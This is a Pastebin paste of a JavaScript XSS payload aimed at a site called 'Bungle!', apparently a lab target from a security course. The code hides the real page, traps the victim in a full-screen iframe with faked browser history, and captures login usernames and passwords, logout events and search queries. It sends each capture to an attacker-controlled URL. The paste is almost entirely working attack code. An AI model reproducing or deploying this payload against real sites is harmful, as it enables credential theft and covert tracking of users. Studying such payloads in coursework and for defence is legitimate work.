Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function payload(attacker) {
- var state = 1
- var states = [];
- var statec = 0;
- var forward = [];
- var forwardi = 0
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href) {
- log({event: "nav", uri: href});
- }
- $("html").hide();
- $(function(){
- $("body").html("");
- var iframe = document.createElement("iframe");
- iframe.style.width = "100%";
- iframe.style.height = "100%";
- iframe.style.position = "absolute";
- document.body.appendChild(iframe);
- proxy("./");
- $("html").show()
- iframe.src = "./";
- window.onpopstate = function(event){
- var cs = history.state
- if(cs.first)
- return
- if(cs.s <= statec){
- statec -= 1
- iframe.contentDocument.location.href = states[statec]
- iframe.src = states[statec]
- history.back()
- } else {
- statec += 1
- iframe.contentDocument.location.href = states[statec]
- iframe.src = states[statec]
- history.pushState({s: statec, first: true}, "", states[statec]);
- }
- log({event: "nav", uri: states[statec]})
- }
- history.pushState({s:0}, "", "./")
- history.pushState({s:0, first: true}, "", "./")
- states.push("./")
- iframe.onload = function(){
- $("iframe").contents().find("#history-list a:contains(\"iframe\")", this).remove()
- $("body", this.contentDocument).one("submit", "form", function(event){
- event.preventDefault();
- event.stopPropagation();
- switch($(this).attr("action")){
- case "./login":
- log({event: "login", user:$("#username", this).val() , pass:$("#userpass", this).val()});
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/");
- history.pushState({s: statec, first: true}, "Bungle!", "/");
- states.push("/")
- break;
- case "./logout":
- log({event: "logout", user: $("#logged-in-user", this).text()});
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/");
- history.pushState({s: statec, first: true}, "Bungle!", "/");
- states.push("/")
- break;
- case "./search":
- var ss = $("#query", this).val()
- var u = $("iframe").contents().find("#logged-in-user", this).text()
- if(u == "")
- log({event: "nav", url: "./search?q="+ss});
- else
- log({event: "nav", user: u, url: "./search?q="+ss});
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/search?q="+ss);
- history.pushState({s: statec, first: true}, "Bungle!", "/search?q="+ss);
- states.push("/search?q="+ss)
- break;
- }
- $(this).submit();
- });
- $("iframe").contents().find("#search-again-btn", this).click(function(){
- proxy("./")
- statec += 1
- history.pushState({s: statec}, "Bungle!", "/");
- history.pushState({s: statec, first: true}, "Bungle!", "/");
- states.push("/")
- })
- }
- });
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement